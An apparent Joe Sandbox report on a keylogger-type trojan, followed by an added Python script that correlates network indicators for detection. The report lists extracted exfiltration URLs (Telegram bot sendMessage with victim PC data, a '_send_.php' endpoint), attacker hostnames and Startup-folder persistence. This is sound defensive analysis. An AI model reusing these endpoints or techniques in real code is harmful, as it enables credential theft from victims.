https://duckduckgo.com/chrome_newtab | RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org | RegSvcs.exe, 00000003.00000002.3370428340.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003097000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | spadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003097000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp | false | | high
https://www.office.com/lB | RegSvcs.exe, 00000003.00000002.3370428340.0000000002D02000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20a | RegSvcs.exe, 00000003.00000002.3370428340.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003097000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org | RegSvcs.exe, 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | RegSvcs.exe, 00000003.00000002.3373483097.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text= | RegSvcs.exe, 00000003.00000002.3370428340.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003097000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=en | RegSvcs.exe, 00000009.00000002.3370233231.0000000003147000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | RegSvcs.exe, 00000003.00000002.3373483097.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://varders.kozow.com:8081 | spadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3368516346.0000000000434000.00000040.80000000.00040000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://mail.acadental.com | RegSvcs.exe, 00000003.00000002.3370428340.0000000002D42000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.00000000031B3000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://aborters.duckdns.org:8081 | spadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3368516346.0000000000434000.00000040.80000000.00040000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | RegSvcs.exe, 00000003.00000002.3373483097.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://51.38.247.67:8081/_send_.php?L | RegSvcs.exe, 00000003.00000002.3370428340.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.00000000031A3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://anotherarmy.dns.army:8081 | spadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3368516346.0000000000434000.00000040.80000000.00040000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | RegSvcs.exe, 00000003.00000002.3373483097.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org/q | spadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=enlB | RegSvcs.exe, 00000003.00000002.3370428340.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003142000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189$ | RegSvcs.exe, 00000003.00000002.3370428340.0000000002BBA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003097000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003070000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.000000000302A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org | RegSvcs.exe, 00000003.00000002.3370428340.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003097000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003070000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003000000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | RegSvcs.exe, 00000003.00000002.3373483097.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | spadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/ | spadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003000000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.21.16.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
3.130.71.34 | mail.acadental.com | United States | 16509 | AMAZON-02US | true
193.122.6.168 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1587901
Start date and time: 2025-01-10 19:09:47 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 58s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: RubzLi27lr.exe (renamed because the original name is a hash value)
Original Sample Name: eadcb6ea284444fdf72e7fa141be4a0d9d61d5bdd95bdb353e12c507915de1f8.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@10/6@4/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 49
• Number of non-executed functions: 308
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
13:10:45 | API Interceptor | 2779551x Sleep call for process: RegSvcs.exe modified
19:10:46 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | 6mllsKaB2q.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer |
149.154.167.220 | YJwE2gTm02.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | AHSlIDftf1.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | eLo1khn7DQ.exe | malicious | MassLogger RAT |
149.154.167.220 | MzqLQjCwrw.exe | malicious | MassLogger RAT |
149.154.167.220 | r5yYt97sfB.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger |
149.154.167.220 | RmIYOfX0yO.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | IUqsn1SBGy.exe | malicious | AgentTesla |
149.154.167.220 | 8nkdC8daWi.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | B7N48hmO78.exe | malicious | Snake Keylogger, VIP Keylogger |
104.21.16.1 | JNKHlxGvw4.exe | malicious | DCRat, PureLog Stealer, zgRAT | 188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
3.130.71.34 | Nuevo pedido de cotización 663837 4899272.pdf.exe | malicious | Snake Keylogger, VIP Keylogger |
193.122.6.168 | YJwE2gTm02.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | AHSlIDftf1.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | SBkuP3ACSA.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | ql8KpEHT7y.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | 8kDIr4ZdNj.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | 4iDzhJBJVv.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | ln5S7fIBkY.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | IMG_10503677.exe | malicious | MassLogger RAT | checkip.dyndns.org/
193.122.6.168 | Payment 01.08.25.pdf.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
193.122.6.168 | December Reconciliation QuanKang.exe | malicious | Unknown | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
mail.acadental.com | Nuevo pedido de cotización 663837 4899272.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 3.130.71.34
checkip.dyndns.com | YJwE2gTm02.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
checkip.dyndns.com | xom6WSISuh.exe | malicious | MassLogger RAT, PureLog Stealer | 132.226.8.169
checkip.dyndns.com | AHSlIDftf1.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
checkip.dyndns.com | eLo1khn7DQ.exe | malicious | MassLogger RAT | 132.226.247.73
checkip.dyndns.com | MzqLQjCwrw.exe | malicious | MassLogger RAT | 158.101.44.242
checkip.dyndns.com | 3WgNXsWvMO.exe | malicious | MassLogger RAT | 132.226.8.169
checkip.dyndns.com | SBkuP3ACSA.exe | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | v3tK92KcJV.exe | malicious | Snake Keylogger | 132.226.247.73
checkip.dyndns.com | r5yYt97sfB.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 132.226.8.169
checkip.dyndns.com | RmIYOfX0yO.exe | malicious | GuLoader, Snake Keylogger | 158.101.44.242
reallyfreegeoip.org | YJwE2gTm02.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
reallyfreegeoip.org | xom6WSISuh.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.112.1
reallyfreegeoip.org | AHSlIDftf1.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.64.1
reallyfreegeoip.org | eLo1khn7DQ.exe | malicious | MassLogger RAT | 104.21.64.1
reallyfreegeoip.org | MzqLQjCwrw.exe | malicious | MassLogger RAT | 104.21.96.1
reallyfreegeoip.org | 3WgNXsWvMO.exe | malicious | MassLogger RAT | 104.21.80.1
reallyfreegeoip.org | SBkuP3ACSA.exe | malicious | Snake Keylogger |
                                                                                                                • 104.21.16.1
                                                                                                                v3tK92KcJV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • 104.21.16.1
                                                                                                                r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.80.1
                                                                                                                RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 104.21.80.1
                                                                                                                api.telegram.org6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 149.154.167.220
                                                                                                                MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 149.154.167.220
                                                                                                                r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                IUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 149.154.167.220
                                                                                                                8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                B7N48hmO78.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
--- | --- | --- | --- | --- | --- | ---
TELEGRAMRU | 6mllsKaB2q.exe | Get hash | malicious | AsyncRAT, StormKitty, WorldWind Stealer | Browse | 149.154.167.220
 | YJwE2gTm02.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | AHSlIDftf1.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | eLo1khn7DQ.exe | Get hash | malicious | MassLogger RAT | Browse | 149.154.167.220
 | MzqLQjCwrw.exe | Get hash | malicious | MassLogger RAT | Browse | 149.154.167.220
 | r5yYt97sfB.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | RmIYOfX0yO.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
 | IUqsn1SBGy.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
 | 8nkdC8daWi.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | 4hQFnbWlj8.exe | Get hash | malicious | Vidar | Browse | 149.154.167.99
CLOUDFLARENETUS | 6mllsKaB2q.exe | Get hash | malicious | AsyncRAT, StormKitty, WorldWind Stealer | Browse | 172.67.196.114
 | Voicemail_+Transcription+_ATT006151.docx | Get hash | malicious | Unknown | Browse | 104.17.25.14
 | YJwE2gTm02.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.112.1
 | Y8Q1voljvb.exe | Get hash | malicious | AgentTesla | Browse | 104.26.12.205
 | ofZiNLLKZU.exe | Get hash | malicious | FormBook | Browse | 104.21.28.65
 | xom6WSISuh.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 104.21.112.1
 | 3HnH4uJtE7.exe | Get hash | malicious | FormBook | Browse | 104.21.48.233
 | https://www.mentimeter.com/app/presentation/alp52o7zih4ubnvbqe9pvb585a1z3bd7/edit?source=share-modal | Get hash | malicious | Unknown | Browse | 104.17.25.14
 | AHSlIDftf1.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.64.1
 | eLo1khn7DQ.exe | Get hash | malicious | MassLogger RAT | Browse | 104.21.64.1
AMAZON-02US | 3HnH4uJtE7.exe | Get hash | malicious | FormBook | Browse | 13.248.169.48
 | https://www.mentimeter.com/app/presentation/alp52o7zih4ubnvbqe9pvb585a1z3bd7/edit?source=share-modal | Get hash | malicious | Unknown | Browse | 108.138.26.78
 | FG5wHs4fVX.exe | Get hash | malicious | FormBook | Browse | 18.143.155.63
 | KcSzB2IpP5.exe | Get hash | malicious | FormBook | Browse | 13.228.81.39
 | https://www.depoqq.win/geno | Get hash | malicious | Unknown | Browse | 34.250.141.206
 | phish_alert_sp2_2.0.0.0 (1).eml | Get hash | malicious | Unknown | Browse | 108.138.26.51
 | smQoKNkwB7.exe | Get hash | malicious | FormBook | Browse | 18.143.155.63
 | https://www.shinsengumiusa.com/mrloskie | Get hash | malicious | Unknown | Browse | 3.120.85.61
 | http://infarmbureau.com | Get hash | malicious | Unknown | Browse | 3.131.211.191
 | https://cjerichmond.jimdosite.com/ | Get hash | malicious | Unknown | Browse | 3.255.10.234

Note: these are ASN-level matches. TELEGRAMRU, CLOUDFLARENETUS and AMAZON-02US are large shared providers, and the matches span unrelated families (FormBook, Vidar, AgentTesla) as well as documents and URLs with no classification. ASN context places the sample's traffic inside common hosting, nothing more; block or alert on the specific endpoints, not the ASN.
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
--- | --- | --- | --- | --- | --- | ---
54328bd36c14bd82ddaa0c04b25ed9ad | YJwE2gTm02.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.16.1
 | xom6WSISuh.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 104.21.16.1
 | AHSlIDftf1.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.16.1
 | eLo1khn7DQ.exe | Get hash | malicious | MassLogger RAT | Browse | 104.21.16.1
 | MzqLQjCwrw.exe | Get hash | malicious | MassLogger RAT | Browse | 104.21.16.1
 | 3WgNXsWvMO.exe | Get hash | malicious | MassLogger RAT | Browse | 104.21.16.1
 | SBkuP3ACSA.exe | Get hash | malicious | Snake Keylogger | Browse | 104.21.16.1
 | v3tK92KcJV.exe | Get hash | malicious | Snake Keylogger | Browse | 104.21.16.1
 | r5yYt97sfB.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | 104.21.16.1
 | RmIYOfX0yO.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 104.21.16.1
3b5074b1b5d032e5620f69f9f700ff0e | MqzEQCpFAY.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | 6mllsKaB2q.exe | Get hash | malicious | AsyncRAT, StormKitty, WorldWind Stealer | Browse | 149.154.167.220
 | YJwE2gTm02.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | Y8Q1voljvb.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
 | MWP0FO5rAF.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | MWP0FO5rAF.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | AHSlIDftf1.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | eLo1khn7DQ.exe | Get hash | malicious | MassLogger RAT | Browse | 149.154.167.220
 | grW5hyK960.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | MzqLQjCwrw.exe | Get hash | malicious | MassLogger RAT | Browse | 149.154.167.220

Note: both JA3 values are TLS client fingerprints, and both match samples of several unrelated families plus unclassified ones (the first value toward the reallyfreegeoip.org edge 104.21.16.1, the second toward the Telegram API at 149.154.167.220). They fingerprint a TLS stack in common use, not this sample, so a JA3 hit alone should not drive a verdict.
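The three context tables above share one lesson: every indicator in them (the Telegram bot API, the geo-IP service, the Cloudflare and AWS ASNs, the two JA3 hashes) is also matched by MassLogger, AgentTesla, FormBook and unclassified samples, so none of them is a useful detection on its own. What does distinguish the sample is the sequence the report records on one host: a geo-IP lookup followed by Telegram bot-API traffic over the same shared TLS stack. The script below is an added example, not part of the Joe Sandbox report; it takes the indicator values from the tables, runs them over constructed log lines (the `dns` / `conn` / `tls_ja3` event format is an assumption about the log source), and only rates a host "high" when the combination occurs inside a short window.

```python
"""Correlate the shared network indicators from the context tables into a per-host verdict.

Added example, not part of the Joe Sandbox report. Indicator values come from the tables
above; the log lines are constructed, and the event kinds (dns / conn / tls_ja3) are an
assumption about the log source.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Every value here is shared infrastructure or a shared TLS client fingerprint; the
# report's context tables match each of them to several unrelated families, so a single
# hit is weak evidence on its own.
INDICATORS = {
    "domain": {
        "api.telegram.org": "telegram_api",      # bot API used as the exfiltration channel
        "reallyfreegeoip.org": "geoip_lookup",   # victim-country lookup before reporting
    },
    "ip": {
        "149.154.167.220": "telegram_api",       # TELEGRAMRU front end
        "104.21.16.1": "cloudflare_edge",        # reallyfreegeoip.org behind Cloudflare
    },
    "ja3": {
        "3b5074b1b5d032e5620f69f9f700ff0e": "ja3_shared",
        "54328bd36c14bd82ddaa0c04b25ed9ad": "ja3_shared",
    },
}
KIND_TO_TYPE = {"dns": "domain", "conn": "ip", "tls_ja3": "ja3"}

# Constructed log lines: timestamp, host, event kind, value.
LOG_LINES = """\
2025-01-10T09:00:01Z WS01 dns reallyfreegeoip.org
2025-01-10T09:00:02Z WS01 tls_ja3 3b5074b1b5d032e5620f69f9f700ff0e
2025-01-10T09:00:03Z WS01 dns api.telegram.org
2025-01-10T09:00:03Z WS01 conn 149.154.167.220
2025-01-10T11:15:00Z WS02 dns api.telegram.org
2025-01-10T11:15:00Z WS02 conn 149.154.167.220
2025-01-10T14:00:00Z WS03 tls_ja3 3b5074b1b5d032e5620f69f9f700ff0e
2025-01-10T14:00:00Z WS03 dns updates.example.net
"""


def tag_event(kind, value):
    """Map one log event to an indicator tag, or None when it matches nothing."""
    return INDICATORS.get(KIND_TO_TYPE.get(kind, ""), {}).get(value)


def score(tags):
    """Geo-IP lookup plus Telegram traffic from one host is the sequence this sample
    exhibits; Telegram alone is a weaker signal, a bare JA3 or edge hit is noise."""
    if "geoip_lookup" in tags and "telegram_api" in tags:
        return "high"
    if "telegram_api" in tags:
        return "medium"
    return "low" if tags else "none"


def correlate(log_text, window=timedelta(minutes=10)):
    """Return {host: (verdict, sorted tags)} using the densest window of tagged events."""
    per_host = defaultdict(list)
    for line in log_text.splitlines():
        ts, host, kind, value = line.split()
        tag = tag_event(kind, value)
        if tag:
            per_host[host].append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), tag))
    verdicts = {}
    for host, events in per_host.items():
        events.sort()
        best = set()
        for i, (start, _) in enumerate(events):
            # distinct indicator classes seen within `window` of this event
            in_window = {t for ts, t in events[i:] if ts - start <= window}
            if len(in_window) > len(best):
                best = in_window
        verdicts[host] = (score(best), sorted(best))
    return verdicts


if __name__ == "__main__":
    for host, (verdict, tags) in sorted(correlate(LOG_LINES).items()):
        print(f"{host}: {verdict} {tags}")
```

On the constructed input WS01 rates high (geo-IP lookup, Telegram DNS and connection, and the shared JA3 within three seconds), WS02 rates medium (Telegram only) and WS03 rates low (only the JA3 hash, which the table above shows is shared with unclassified samples). Tune the window to the dwell time you observe between the geo-IP request and the first Telegram POST in your own telemetry.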
No context

Process:C:\Users\user\Desktop\RubzLi27lr.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1094656
Entropy (8bit):6.936211076561911
Encrypted:false
SSDEEP:24576:0qDEvCTbMWu7rQYlBQcBiT6rprG8aDHikw:0TvC/MTQYxsWR7aDHik
MD5:44F0EA32A5ACF017ACF1D2A595C615F1
SHA1:EF36981F3271CF8C1A4B16A86B3D5F232337BB93
SHA-256:EADCB6EA284444FDF72E7FA141BE4A0D9D61D5BDD95BDB353E12C507915DE1F8
